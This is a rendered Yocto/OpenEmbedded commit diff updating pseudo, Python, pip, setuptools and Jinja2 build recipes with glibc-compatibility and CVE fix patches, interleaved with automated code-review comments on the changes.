index 0000000000..c453b5f735
--- /dev/null
+++ b/meta/recipes-devtools/pseudo/files/older-glibc-symbols.patch
@@ -0,0 +1,57 @@
1If we link against a newer glibc 2.34 and then try and our LD_PRELOAD is run against a
2binary on a host with an older libc, we see symbol errors since in glibc 2.34, pthread
3and dl are merged into libc itself.
4
5We need to use the older form of linking so use glibc binaries from an older release
6to force this. We only use minimal symbols from these anyway.
7
8pthread_atfork is problematic, particularly on arm so use the internal glibc routine
9it maps too. This was always present in the main libc from 2.3.2 onwards.
10
11Yes this is horrible. Better solutions welcome.
12
13There is more info in the bug: [YOCTO #14521]
14
15Upstream-Status: Inappropriate [this patch is native and nativesdk]
16Signed-off-by: Richard Purdie <richard.purdie@linuxfoundation.org>
17
18Tweak library search order, make prebuilt lib ahead of recipe lib
19Signed-off-by: Hongxu Jia <hongxu.jia@windriver.com>
20---
21 Makefile.in | 2 +-
22 pseudo_wrappers.c | 5 ++++-
23 2 files changed, 5 insertions(+), 2 deletions(-)
24
25diff --git a/Makefile.in b/Makefile.in
26--- a/Makefile.in
27+++ b/Makefile.in
28@@ -120,7 +120,7 @@ $(PSEUDODB): pseudodb.o $(SHOBJS) $(DBOBJS) pseudo_ipc.o | $(BIN)
29 libpseudo: $(LIBPSEUDO)
30
31 $(LIBPSEUDO): $(WRAPOBJS) pseudo_client.o pseudo_ipc.o $(SHOBJS) | $(LIB)
32- $(CC) $(CFLAGS) $(CFLAGS_PSEUDO) -shared -o $(LIBPSEUDO) \
33+ $(CC) $(CFLAGS) -Lprebuilt/$(shell uname -m)-linux/lib/ $(CFLAGS_PSEUDO) -shared -o $(LIBPSEUDO) \
34 pseudo_client.o pseudo_ipc.o \
35 $(WRAPOBJS) $(SHOBJS) $(LDFLAGS) $(CLIENT_LDFLAGS)
36
37diff --git a/pseudo_wrappers.c b/pseudo_wrappers.c
38--- a/pseudo_wrappers.c
39+++ b/pseudo_wrappers.c
40@@ -100,10 +100,13 @@ static void libpseudo_atfork_child(void)
41 pseudo_mutex_holder = 0;
42 }
43
44+extern void *__dso_handle;
45+extern int __register_atfork (void (*) (void), void (*) (void), void (*) (void), void *);
46+
47 static void
48 _libpseudo_init(void) {
49 if (!_libpseudo_initted)
50- pthread_atfork(NULL, NULL, libpseudo_atfork_child);
51+ __register_atfork (NULL, NULL, libpseudo_atfork_child, &__dso_handle == NULL ? NULL : __dso_handle);
52
53 pseudo_getlock();
54 pseudo_antimagic();
55--
562.27.0
57
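--- a/meta/recipes-devtools/pseudo/pseudo.inc
+++ b/meta/recipes-devtools/pseudo/pseudo.inc
@@ -4,6 +4,7 @@
 
 SUMMARY = "Pseudo gives fake root capabilities to a normal user"
 HOMEPAGE = "http://git.yoctoproject.org/cgit/cgit.cgi/pseudo"
+DESCRIPTION = "The pseudo utility offers a way to run commands in a virtualized root environment."
 LIC_FILES_CHKSUM = "file://COPYING;md5=a1d8023a6f953ac6ea4af765ff62d574"
 SECTION = "base"
 LICENSE = "LGPL2.1"
@@ -111,6 +112,19 @@ do_compile_prepend_class-nativesdk () {
  fi
 }
 
+do_compile_append_class-native () {
+ if [ '${@bb.data.inherits_class('uninative', d)}' = 'True' ]; then
+ for i in PSEUDO_PORT_UNIX_SYNCFS PSEUDO_PORT_UIDS_GENERIC PSEUDO_PORT_LINUX_NEWCLONE PSEUDO_PORT_LINUX_XATTR PSEUDO_PORT_LINUX_STATVFS; do
+ grep $i.1 ${S}/pseudo_ports.h
+ if [ $? != 0 ]; then
+ echo "$i not enabled in pseudo which is incompatible with uninative"
+ exit 1
+ fi
+ done
+ fi
+}
+
+
 do_install () {
  oe_runmake 'DESTDIR=${D}' ${MAKEOPTS} 'LIB=lib/pseudo/lib$(MARK64)' install
 }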
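Review bot: In the new `do_compile_append_class-native`, `grep $i.1 ${S}/pseudo_ports.h` runs as a bare command and its status is only tested on the next line through `$?`. If this task's shell runs with `set -e`, as BitBake-generated run scripts normally do, a failed grep ends the task at that point and the explanatory `echo` is never printed. The build still fails, but without the message this block exists to give. Testing the command directly avoids that and keeps the matched lines out of the log: `if ! grep -q "$i.1" ${S}/pseudo_ports.h; then`. The `.` is also a regex wildcard, so the pattern is looser than a literal separator would be.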
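--- a/meta/recipes-devtools/pseudo/pseudo_git.bb
+++ b/meta/recipes-devtools/pseudo/pseudo_git.bb
@@ -5,8 +5,15 @@ SRC_URI = "git://git.yoctoproject.org/pseudo;branch=oe-core \
  file://fallback-passwd \
  file://fallback-group \
  "
+SRC_URI:append:class-native = " \
+ http://downloads.yoctoproject.org/mirror/sources/pseudo-prebuilt-2.33.tar.xz;subdir=git/prebuilt;name=prebuilt \
+ file://older-glibc-symbols.patch"
+SRC_URI:append:class-nativesdk = " \
+ http://downloads.yoctoproject.org/mirror/sources/pseudo-prebuilt-2.33.tar.xz;subdir=git/prebuilt;name=prebuilt \
+ file://older-glibc-symbols.patch"
+SRC_URI[prebuilt.sha256sum] = "ed9f456856e9d86359f169f46a70ad7be4190d6040282b84c8d97b99072485aa"
 
-SRCREV = "60e25a36558f1f07dcce1a044fe976b475bec42b"
+SRCREV = "2b4b88eb513335b0ece55fe51854693d9b20de35"
 S = "${WORKDIR}/git"
 PV = "1.9.0+git${SRCPV}"
 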
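Review bot: The two new assignments `SRC_URI:append:class-native` and `SRC_URI:append:class-nativesdk` use the colon override form, while the other recipes touched on this page use the underscore form (`SRC_URI_append_class-native` in perl and python-setuptools, `do_compile_append_class-native` in pseudo.inc). If the BitBake in this tree does not treat `:` as an override separator, these lines would not take effect, and neither the prebuilt tarball nor older-glibc-symbols.patch would be applied, probably without any error. That is worth confirming on this branch. Alternatively, write them as `SRC_URI_append_class-native = " \` and `SRC_URI_append_class-nativesdk = " \` to match the rest of the tree.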
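--- a/meta/recipes-devtools/python-numpy/python-numpy.inc
+++ b/meta/recipes-devtools/python-numpy/python-numpy.inc
@@ -1,4 +1,6 @@
 SUMMARY = "A sophisticated Numeric Processing Package for Python"
+HOMEPAGE = "https://numpy.org/"
+DESCRIPTION = "NumPy is the fundamental package needed for scientific computing with Python."
 SECTION = "devel/python"
 LICENSE = "BSD-3-Clause & BSD-2-Clause & PSF & Apache-2.0 & BSD & MIT"
 LIC_FILES_CHKSUM = "file://LICENSE.txt;md5=1a32aba007a415aa8a1c708a0e2b86a1"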
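--- a/meta/recipes-devtools/python/python-setuptools.inc
+++ b/meta/recipes-devtools/python/python-setuptools.inc
@@ -8,6 +8,8 @@ PYPI_PACKAGE_EXT = "zip"
 
 inherit pypi
 
+SRC_URI += " file://CVE-2022-40897.patch "
+
 SRC_URI_append_class-native = " file://0001-conditionally-do-not-fetch-code-by-easy_install.patch"
 
 SRC_URI[md5sum] = "0c956eea142af9c2b02d72e3c042af30"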
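--- a/meta/recipes-devtools/python/python3-jinja2_2.11.2.bb
+++ b/meta/recipes-devtools/python/python3-jinja2_2.11.3.bb
@@ -1,12 +1,15 @@
 DESCRIPTION = "Python Jinja2: A small but fast and easy to use stand-alone template engine written in pure python."
+HOMEPAGE = "https://pypi.org/project/Jinja2/"
 
 LICENSE = "BSD-3-Clause"
 LIC_FILES_CHKSUM = "file://LICENSE.rst;md5=5dc88300786f1c214c1e9827a5229462"
 
-SRC_URI[sha256sum] = "89aab215427ef59c34ad58735269eb58b1a5808103067f7bb9d5836c651b3bb0"
+SRC_URI[sha256sum] = "a6d58433de0ae800347cab1fa3043cebbabe8baa9d29e668f1c768cb87a333c6"
 
 PYPI_PACKAGE = "Jinja2"
 
+CVE_PRODUCT = "jinja2 jinja"
+
 CLEANBROKEN = "1"
 
 inherit pypi setuptools3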
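--- a/meta/recipes-devtools/python/python3-magic_0.4.15.bb
+++ b/meta/recipes-devtools/python/python3-magic_0.4.15.bb
@@ -14,6 +14,11 @@ inherit pypi setuptools3
 SRC_URI[md5sum] = "e384c95a47218f66c6501cd6dd45ff59"
 SRC_URI[sha256sum] = "f3765c0f582d2dfc72c15f3b5a82aecfae9498bd29ca840d72f37d7bd38bfcd5"
 
-RDEPENDS_${PN} += "file"
+DEPENDS_append_class-native = " file-replacement-native"
+
+RDEPENDS_${PN} += "file \
+ ${PYTHON_PN}-ctypes \
+ ${PYTHON_PN}-io \
+ ${PYTHON_PN}-shell"
 
 BBCLASSEXTEND = "native"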
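--- /dev/null
+++ b/meta/recipes-devtools/python/python3-pip/CVE-2021-3572.patch
@@ -0,0 +1,48 @@
+From c4fd13410b9a219f77fc30775d4a0ac9f69725bd Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Thu, 16 Jun 2022 09:52:43 +0530
+Subject: [PATCH] CVE-2021-3572
+
+Upstream-Status: Backport [https://github.com/pypa/pip/commit/e46bdda9711392fec0c45c1175bae6db847cb30b]
+CVE: CVE-2021-3572
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ news/9827.bugfix.rst | 3 +++
+ src/pip/_internal/vcs/git.py | 10 ++++++++--
+ 2 files changed, 11 insertions(+), 2 deletions(-)
+ create mode 100644 news/9827.bugfix.rst
+
+diff --git a/news/9827.bugfix.rst b/news/9827.bugfix.rst
+new file mode 100644
+index 0000000..e0d27c3
+--- /dev/null
++++ b/news/9827.bugfix.rst
+@@ -0,0 +1,3 @@
++**SECURITY**: Stop splitting on unicode separators in git references,
++which could be maliciously used to install a different revision on the
++repository.
+diff --git a/src/pip/_internal/vcs/git.py b/src/pip/_internal/vcs/git.py
+index 7483303..1b895f6 100644
+--- a/src/pip/_internal/vcs/git.py
++++ b/src/pip/_internal/vcs/git.py
+@@ -137,9 +137,15 @@ class Git(VersionControl):
+ output = cls.run_command(['show-ref', rev], cwd=dest,
+ show_stdout=False, on_returncode='ignore')
+ refs = {}
+- for line in output.strip().splitlines():
++ # NOTE: We do not use splitlines here since that would split on other
++ # unicode separators, which can be maliciously used to install a
++ # different revision.
++ for line in output.strip().split("\n"):
++ line = line.rstrip("\r")
++ if not line:
++ continue
+ try:
+- sha, ref = line.split()
++ ref_sha, ref_name = line.split(" ", maxsplit=2)
+ except ValueError:
+ # Include the offending line to simplify troubleshooting if
+ # this error ever occurs.
+--
+2.25.1
+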
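Review bot: The new unpack in the git.py hunk binds `ref_sha, ref_name`, but the hunk (`@@ -137,9 +137,15 @@`) stops at the comment under `except ValueError:`, so the statement that stores the pair into `refs` is not touched by this backport. If the unpatched pip 20.0.2 source still reads `refs[ref] = sha` at that point (not visible here), the old names are never bound and the lookup would fail with a NameError/UnboundLocalError instead of recording the ref. The backport should either carry the rename as well, `refs[ref_name] = ref_sha`, or keep the original names in the unpack, `sha, ref = line.split(" ", maxsplit=2)`. The enclosing method starts and ends outside the hunk, so this needs checking against the patched tree.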
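--- a/meta/recipes-devtools/python/python3-pip_20.0.2.bb
+++ b/meta/recipes-devtools/python/python3-pip_20.0.2.bb
@@ -6,6 +6,7 @@ LIC_FILES_CHKSUM = "file://LICENSE.txt;md5=8ba06d529c955048e5ddd7c45459eb2e"
 
 DEPENDS += "python3 python3-setuptools-native"
 
+SRC_URI = "file://CVE-2021-3572.patch "
 SRC_URI[md5sum] = "7d42ba49b809604f0df3d55df1c3fd86"
 SRC_URI[sha256sum] = "7db0c8ea4c7ea51c8049640e8e6e7fde949de672bfa4949920675563a5a6967f"
 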
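Review bot: `SRC_URI = "file://CVE-2021-3572.patch "` is a plain assignment, so it discards anything assigned to SRC_URI earlier and only yields a complete source list if the tarball URL is appended afterwards (presumably by an `inherit pypi` further down, which is outside this hunk). The setuptools include changed in the same commit adds its CVE patch with `SRC_URI += " file://CVE-2022-40897.patch "`. Using the same form here, `SRC_URI += "file://CVE-2021-3572.patch"`, keeps the two recipes consistent, does not depend on statement order, and drops the trailing space inside the quotes.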
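--- a/meta/recipes-devtools/python/python3-pygobject_3.34.0.bb
+++ b/meta/recipes-devtools/python/python3-pygobject_3.34.0.bb
@@ -1,4 +1,6 @@
 SUMMARY = "Python GObject bindings"
+HOMEPAGE = "https://gitlab.gnome.org/GNOME/pygobject"
+DESCRIPTION = "PyGObject is a Python package which provides bindings for GObject based libraries such as GTK, GStreamer, WebKitGTK, GLib, GIO and many more."
 SECTION = "devel/python"
 LICENSE = "LGPLv2.1"
 LIC_FILES_CHKSUM = "file://COPYING;md5=a916467b91076e631dd8edb7424769c7"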
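--- a/meta/recipes-devtools/python/python3-scons_3.1.2.bb
+++ b/meta/recipes-devtools/python/python3-scons_3.1.2.bb
@@ -1,4 +1,5 @@
 SUMMARY = "Software Construction tool (make/autotools replacement)"
+HOMEPAGE = "https://github.com/SCons/scons"
 SECTION = "devel/python"
 LICENSE = "MIT"
 LIC_FILES_CHKSUM = "file://${WORKDIR}/LICENSE-python3-scons-${PV};md5=e14e1b33428df24a40a782ae142785d0"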
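--- /dev/null
+++ b/meta/recipes-devtools/python/python3-setuptools/CVE-2022-40897.patch
@@ -0,0 +1,29 @@
+From 43a9c9bfa6aa626ec2a22540bea28d2ca77964be Mon Sep 17 00:00:00 2001
+From: "Jason R. Coombs" <jaraco@jaraco.com>
+Date: Fri, 4 Nov 2022 13:47:53 -0400
+Subject: [PATCH] Limit the amount of whitespace to search/backtrack. Fixes
+ #3659.
+
+CVE: CVE-2022-40897
+Upstream-Status: Backport [
+Upstream : https://github.com/pypa/setuptools/commit/43a9c9bfa6aa626ec2a22540bea28d2ca77964be
+Import from Ubuntu: http://archive.ubuntu.com/ubuntu/pool/main/s/setuptools/setuptools_45.2.0-1ubuntu0.1.debian.tar.xz
+]
+Signed-off-by: Lee Chee Yang <chee.yang.lee@intel.com>
+
+---
+ setuptools/package_index.py | 2 +-
+ setuptools/tests/test_packageindex.py | 1 -
+ 2 files changed, 1 insertion(+), 2 deletions(-)
+
+--- setuptools-45.2.0.orig/setuptools/package_index.py
++++ setuptools-45.2.0/setuptools/package_index.py
+@@ -215,7 +215,7 @@ def unique_values(func):
+ return wrapper
+
+
+-REL = re.compile(r"""<([^>]*\srel\s*=\s*['"]?([^'">]+)[^>]*)>""", re.I)
++REL = re.compile(r"""<([^>]*\srel\s{0,10}=\s{0,10}['"]?([^'" >]+)[^>]*)>""", re.I)
+ # this line is here to fix emacs' cruddy broken syntax highlighting
+
+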
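Review bot: The patch header's diffstat lists `setuptools/tests/test_packageindex.py | 1 -` and "2 files changed, 1 insertion(+), 2 deletions(-)", but the body carries only the `package_index.py` hunk, so the header and the content disagree and nothing in the patch exercises the changed regex. Either regenerate the diffstat for the single file or carry the test hunk it refers to. The new `REL` pattern would also benefit from a one-line comment for whoever next refreshes it, for example `# \s{0,10}: whitespace is bounded so a crafted index page cannot force excessive backtracking (CVE-2022-40897)`. The file-level context around `REL` lies outside the hunk.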
diff --git a/meta/recipes-devtools/python/python3/0001-bpo-36852-proper-detection-of-mips-architecture-for-.patch b/meta/recipes-devtools/python/python3/0001-bpo-36852-proper-detection-of-mips-architecture-for-.patch
index c4fae09a5b..4ac0e140cc 100644
--- a/meta/recipes-devtools/python/python3/0001-bpo-36852-proper-detection-of-mips-architecture-for-.patch
+++ b/meta/recipes-devtools/python/python3/0001-bpo-36852-proper-detection-of-mips-architecture-for-.patch
@@ -14,17 +14,21 @@ Upstream-Status: Submitted [https://github.com/python/cpython/pull/13196]
14Signed-off-by: Matthias Schoepfer <matthias.schoepfer@ithinx.io> 14Signed-off-by: Matthias Schoepfer <matthias.schoepfer@ithinx.io>
15 15
16%% original patch: 0001-bpo-36852-proper-detection-of-mips-architecture-for-.patch 16%% original patch: 0001-bpo-36852-proper-detection-of-mips-architecture-for-.patch
17
18Updated to apply after dea270a2a80214de22afadaaca2043d0d782eb7d
19
20Signed-off-by: Tim Orling <tim.orling@konsulko.com>
17--- 21---
18 configure.ac | 175 +++++++-------------------------------------------- 22 configure.ac | 175 +++++++--------------------------------------------
19 1 file changed, 21 insertions(+), 154 deletions(-) 23 1 file changed, 21 insertions(+), 154 deletions(-)
20 24
21diff --git a/configure.ac b/configure.ac 25diff --git a/configure.ac b/configure.ac
22index ede710e..bc81b0b 100644 26index de83332dd3..16b02d0798 100644
23--- a/configure.ac 27--- a/configure.ac
24+++ b/configure.ac 28+++ b/configure.ac
25@@ -710,160 +710,27 @@ fi 29@@ -719,160 +719,27 @@ then
26 MULTIARCH=$($CC --print-multiarch 2>/dev/null) 30 fi
27 AC_SUBST(MULTIARCH) 31
28 32
29-AC_MSG_CHECKING([for the platform triplet based on compiler characteristics]) 33-AC_MSG_CHECKING([for the platform triplet based on compiler characteristics])
30-cat >> conftest.c <<EOF 34-cat >> conftest.c <<EOF
@@ -185,25 +189,25 @@ index ede710e..bc81b0b 100644
185+## Need to handle macos, vxworks and hurd special (?) :-/ 189+## Need to handle macos, vxworks and hurd special (?) :-/
186+case ${target_os} in 190+case ${target_os} in
187+ darwin*) 191+ darwin*)
188+ PLATFORM_TRIPLET=darwin 192+ PLATFORM_TRIPLET=darwin
189+ ;; 193+ ;;
190+ hurd*) 194+ hurd*)
191+ PLATFORM_TRIPLET=i386-gnu 195+ PLATFORM_TRIPLET=i386-gnu
192+ ;; 196+ ;;
193+ vxworks*) 197+ vxworks*)
194+ PLATFORM_TRIPLET=vxworks 198+ PLATFORM_TRIPLET=vxworks
195+ ;; 199+ ;;
196+ *) 200+ *)
197+ if test "${target_cpu}" != "i686"; then 201+ if test "${target_cpu}" != "i686"; then
198+ PLATFORM_TRIPLET=${target_cpu}-${target_os} 202+ PLATFORM_TRIPLET=${target_cpu}-${target_os}
199+ else 203+ else
200+ PLATFORM_TRIPLET=i386-${target_os} 204+ PLATFORM_TRIPLET=i386-${target_os}
201+ fi 205+ fi
202+ ;; 206+ ;;
203+esac 207+esac
204 208
205 if test x$PLATFORM_TRIPLET != x && test x$MULTIARCH != x; then 209 if test x$PLATFORM_TRIPLET != xdarwin; then
206 if test x$PLATFORM_TRIPLET != x$MULTIARCH; then 210 MULTIARCH=$($CC --print-multiarch 2>/dev/null)
207-- 211--
2082.24.1 2122.32.0
209 213
diff --git a/meta/recipes-devtools/python/python3/0001-bpo-39503-CVE-2020-8492-Fix-AbstractBasicAuthHandler.patch b/meta/recipes-devtools/python/python3/0001-bpo-39503-CVE-2020-8492-Fix-AbstractBasicAuthHandler.patch
deleted file mode 100644
index e16b99bcb9..0000000000
--- a/meta/recipes-devtools/python/python3/0001-bpo-39503-CVE-2020-8492-Fix-AbstractBasicAuthHandler.patch
+++ /dev/null
@@ -1,248 +0,0 @@
1From 0b297d4ff1c0e4480ad33acae793fbaf4bf015b4 Mon Sep 17 00:00:00 2001
2From: Victor Stinner <vstinner@python.org>
3Date: Thu, 2 Apr 2020 02:52:20 +0200
4Subject: [PATCH] bpo-39503: CVE-2020-8492: Fix AbstractBasicAuthHandler
5 (GH-18284)
6
7Upstream-Status: Backport
8(https://github.com/python/cpython/commit/0b297d4ff1c0e4480ad33acae793fbaf4bf015b4)
9
10CVE: CVE-2020-8492
11
12The AbstractBasicAuthHandler class of the urllib.request module uses
13an inefficient regular expression which can be exploited by an
14attacker to cause a denial of service. Fix the regex to prevent the
15catastrophic backtracking. Vulnerability reported by Ben Caller
16and Matt Schwager.
17
18AbstractBasicAuthHandler of urllib.request now parses all
19WWW-Authenticate HTTP headers and accepts multiple challenges per
20header: use the realm of the first Basic challenge.
21
22Co-Authored-By: Serhiy Storchaka <storchaka@gmail.com>
23Signed-off-by: Trevor Gamblin <trevor.gamblin@windriver.com>
24---
25 Lib/test/test_urllib2.py | 90 ++++++++++++-------
26 Lib/urllib/request.py | 69 ++++++++++----
27 .../2020-03-25-16-02-16.bpo-39503.YmMbYn.rst | 3 +
28 .../2020-01-30-16-15-29.bpo-39503.B299Yq.rst | 5 ++
29 4 files changed, 115 insertions(+), 52 deletions(-)
30 create mode 100644 Misc/NEWS.d/next/Library/2020-03-25-16-02-16.bpo-39503.YmMbYn.rst
31 create mode 100644 Misc/NEWS.d/next/Security/2020-01-30-16-15-29.bpo-39503.B299Yq.rst
32
33diff --git a/Lib/test/test_urllib2.py b/Lib/test/test_urllib2.py
34index 8abedaac98..e69ac3e213 100644
35--- a/Lib/test/test_urllib2.py
36+++ b/Lib/test/test_urllib2.py
37@@ -1446,40 +1446,64 @@ class HandlerTests(unittest.TestCase):
38 bypass = {'exclude_simple': True, 'exceptions': []}
39 self.assertTrue(_proxy_bypass_macosx_sysconf('test', bypass))
40
41- def test_basic_auth(self, quote_char='"'):
42- opener = OpenerDirector()
43- password_manager = MockPasswordManager()
44- auth_handler = urllib.request.HTTPBasicAuthHandler(password_manager)
45- realm = "ACME Widget Store"
46- http_handler = MockHTTPHandler(
47- 401, 'WWW-Authenticate: Basic realm=%s%s%s\r\n\r\n' %
48- (quote_char, realm, quote_char))
49- opener.add_handler(auth_handler)
50- opener.add_handler(http_handler)
51- self._test_basic_auth(opener, auth_handler, "Authorization",
52- realm, http_handler, password_manager,
53- "http://acme.example.com/protected",
54- "http://acme.example.com/protected",
55- )
56-
57- def test_basic_auth_with_single_quoted_realm(self):
58- self.test_basic_auth(quote_char="'")
59-
60- def test_basic_auth_with_unquoted_realm(self):
61- opener = OpenerDirector()
62- password_manager = MockPasswordManager()
63- auth_handler = urllib.request.HTTPBasicAuthHandler(password_manager)
64- realm = "ACME Widget Store"
65- http_handler = MockHTTPHandler(
66- 401, 'WWW-Authenticate: Basic realm=%s\r\n\r\n' % realm)
67- opener.add_handler(auth_handler)
68- opener.add_handler(http_handler)
69- with self.assertWarns(UserWarning):
70+ def check_basic_auth(self, headers, realm):
71+ with self.subTest(realm=realm, headers=headers):
72+ opener = OpenerDirector()
73+ password_manager = MockPasswordManager()
74+ auth_handler = urllib.request.HTTPBasicAuthHandler(password_manager)
75+ body = '\r\n'.join(headers) + '\r\n\r\n'
76+ http_handler = MockHTTPHandler(401, body)
77+ opener.add_handler(auth_handler)
78+ opener.add_handler(http_handler)
79 self._test_basic_auth(opener, auth_handler, "Authorization",
80- realm, http_handler, password_manager,
81- "http://acme.example.com/protected",
82- "http://acme.example.com/protected",
83- )
84+ realm, http_handler, password_manager,
85+ "http://acme.example.com/protected",
86+ "http://acme.example.com/protected")
87+
88+ def test_basic_auth(self):
89+ realm = "realm2@example.com"
90+ realm2 = "realm2@example.com"
91+ basic = f'Basic realm="{realm}"'
92+ basic2 = f'Basic realm="{realm2}"'
93+ other_no_realm = 'Otherscheme xxx'
94+ digest = (f'Digest realm="{realm2}", '
95+ f'qop="auth, auth-int", '
96+ f'nonce="dcd98b7102dd2f0e8b11d0f600bfb0c093", '
97+ f'opaque="5ccc069c403ebaf9f0171e9517f40e41"')
98+ for realm_str in (
99+ # test "quote" and 'quote'
100+ f'Basic realm="{realm}"',
101+ f"Basic realm='{realm}'",
102+
103+ # charset is ignored
104+ f'Basic realm="{realm}", charset="UTF-8"',
105+
106+ # Multiple challenges per header
107+ f'{basic}, {basic2}',
108+ f'{basic}, {other_no_realm}',
109+ f'{other_no_realm}, {basic}',
110+ f'{basic}, {digest}',
111+ f'{digest}, {basic}',
112+ ):
113+ headers = [f'WWW-Authenticate: {realm_str}']
114+ self.check_basic_auth(headers, realm)
115+
116+ # no quote: expect a warning
117+ with support.check_warnings(("Basic Auth Realm was unquoted",
118+ UserWarning)):
119+ headers = [f'WWW-Authenticate: Basic realm={realm}']
120+ self.check_basic_auth(headers, realm)
121+
122+ # Multiple headers: one challenge per header.
123+ # Use the first Basic realm.
124+ for challenges in (
125+ [basic, basic2],
126+ [basic, digest],
127+ [digest, basic],
128+ ):
129+ headers = [f'WWW-Authenticate: {challenge}'
130+ for challenge in challenges]
131+ self.check_basic_auth(headers, realm)
132
133 def test_proxy_basic_auth(self):
134 opener = OpenerDirector()
135diff --git a/Lib/urllib/request.py b/Lib/urllib/request.py
136index 7fe50535da..2a3d71554f 100644
137--- a/Lib/urllib/request.py
138+++ b/Lib/urllib/request.py
139@@ -937,8 +937,15 @@ class AbstractBasicAuthHandler:
140
141 # allow for double- and single-quoted realm values
142 # (single quotes are a violation of the RFC, but appear in the wild)
143- rx = re.compile('(?:.*,)*[ \t]*([^ \t]+)[ \t]+'
144- 'realm=(["\']?)([^"\']*)\\2', re.I)
145+ rx = re.compile('(?:^|,)' # start of the string or ','
146+ '[ \t]*' # optional whitespaces
147+ '([^ \t]+)' # scheme like "Basic"
148+ '[ \t]+' # mandatory whitespaces
149+ # realm=xxx
150+ # realm='xxx'
151+ # realm="xxx"
152+ 'realm=(["\']?)([^"\']*)\\2',
153+ re.I)
154
155 # XXX could pre-emptively send auth info already accepted (RFC 2617,
156 # end of section 2, and section 1.2 immediately after "credentials"
157@@ -950,27 +957,51 @@ class AbstractBasicAuthHandler:
158 self.passwd = password_mgr
159 self.add_password = self.passwd.add_password
160
161+ def _parse_realm(self, header):
162+ # parse WWW-Authenticate header: accept multiple challenges per header
163+ found_challenge = False
164+ for mo in AbstractBasicAuthHandler.rx.finditer(header):
165+ scheme, quote, realm = mo.groups()
166+ if quote not in ['"', "'"]:
167+ warnings.warn("Basic Auth Realm was unquoted",
168+ UserWarning, 3)
169+
170+ yield (scheme, realm)
171+
172+ found_challenge = True
173+
174+ if not found_challenge:
175+ if header:
176+ scheme = header.split()[0]
177+ else:
178+ scheme = ''
179+ yield (scheme, None)
180+
181 def http_error_auth_reqed(self, authreq, host, req, headers):
182 # host may be an authority (without userinfo) or a URL with an
183 # authority
184- # XXX could be multiple headers
185- authreq = headers.get(authreq, None)
186+ headers = headers.get_all(authreq)
187+ if not headers:
188+ # no header found
189+ return
190
191- if authreq:
192- scheme = authreq.split()[0]
193- if scheme.lower() != 'basic':
194- raise ValueError("AbstractBasicAuthHandler does not"
195- " support the following scheme: '%s'" %
196- scheme)
197- else:
198- mo = AbstractBasicAuthHandler.rx.search(authreq)
199- if mo:
200- scheme, quote, realm = mo.groups()
201- if quote not in ['"',"'"]:
202- warnings.warn("Basic Auth Realm was unquoted",
203- UserWarning, 2)
204- if scheme.lower() == 'basic':
205- return self.retry_http_basic_auth(host, req, realm)
206+ unsupported = None
207+ for header in headers:
208+ for scheme, realm in self._parse_realm(header):
209+ if scheme.lower() != 'basic':
210+ unsupported = scheme
211+ continue
212+
213+ if realm is not None:
214+ # Use the first matching Basic challenge.
215+ # Ignore following challenges even if they use the Basic
216+ # scheme.
217+ return self.retry_http_basic_auth(host, req, realm)
218+
219+ if unsupported is not None:
220+ raise ValueError("AbstractBasicAuthHandler does not "
221+ "support the following scheme: %r"
222+ % (scheme,))
223
224 def retry_http_basic_auth(self, host, req, realm):
225 user, pw = self.passwd.find_user_password(realm, host)
226diff --git a/Misc/NEWS.d/next/Library/2020-03-25-16-02-16.bpo-39503.YmMbYn.rst b/Misc/NEWS.d/next/Library/2020-03-25-16-02-16.bpo-39503.YmMbYn.rst
227new file mode 100644
228index 0000000000..be80ce79d9
229--- /dev/null
230+++ b/Misc/NEWS.d/next/Library/2020-03-25-16-02-16.bpo-39503.YmMbYn.rst
231@@ -0,0 +1,3 @@
232+:class:`~urllib.request.AbstractBasicAuthHandler` of :mod:`urllib.request`
233+now parses all WWW-Authenticate HTTP headers and accepts multiple challenges
234+per header: use the realm of the first Basic challenge.
235diff --git a/Misc/NEWS.d/next/Security/2020-01-30-16-15-29.bpo-39503.B299Yq.rst b/Misc/NEWS.d/next/Security/2020-01-30-16-15-29.bpo-39503.B299Yq.rst
236new file mode 100644
237index 0000000000..9f2800581c
238--- /dev/null
239+++ b/Misc/NEWS.d/next/Security/2020-01-30-16-15-29.bpo-39503.B299Yq.rst
240@@ -0,0 +1,5 @@
241+CVE-2020-8492: The :class:`~urllib.request.AbstractBasicAuthHandler` class of the
242+:mod:`urllib.request` module uses an inefficient regular expression which can
243+be exploited by an attacker to cause a denial of service. Fix the regex to
244+prevent the catastrophic backtracking. Vulnerability reported by Ben Caller
245+and Matt Schwager.
246--
2472.24.1
248
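--- /dev/null
+++ b/meta/recipes-devtools/python/python3/0001-test_ctypes.test_find-skip-without-tools-sdk.patch
@@ -0,0 +1,33 @@
+From 7a2bddfa437be633bb6945d0e6b7d6f27da870ad Mon Sep 17 00:00:00 2001
+From: Tim Orling <timothy.t.orling@intel.com>
+Date: Fri, 18 Jun 2021 11:56:50 -0700
+Subject: [PATCH] test_ctypes.test_find: skip without tools-sdk
+
+These tests need full packagegroup-core-buildessential, the
+easiest way to dynamically check for that is looking for
+'tools-sdk' in IMAGE_FEATURES.
+
+Upstream-Status: Inappropriate [oe-specific]
+
+Signed-off-by: Tim Orling <timothy.t.orling@intel.com>
+---
+ Lib/ctypes/test/test_find.py | 2 ++
+ 1 file changed, 2 insertions(+)
+
+diff --git a/Lib/ctypes/test/test_find.py b/Lib/ctypes/test/test_find.py
+index 92ac184..0d009d1 100644
+--- a/Lib/ctypes/test/test_find.py
++++ b/Lib/ctypes/test/test_find.py
+@@ -112,10 +112,12 @@ class FindLibraryLinux(unittest.TestCase):
+ # LD_LIBRARY_PATH)
+ self.assertEqual(find_library(libname), 'lib%s.so' % libname)
+
++ @unittest.skip("Needs IMAGE_FEATURES += \"tools-sdk\"")
+ def test_find_library_with_gcc(self):
+ with unittest.mock.patch("ctypes.util._findSoname_ldconfig", lambda *args: None):
+ self.assertNotEqual(find_library('c'), None)
+
++ @unittest.skip("Needs IMAGE_FEATURES += \"tools-sdk\"")
+ def test_find_library_with_ld(self):
+ with unittest.mock.patch("ctypes.util._findSoname_ldconfig", lambda *args: None), \
+ unittest.mock.patch("ctypes.util._findLib_gcc", lambda *args: None):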
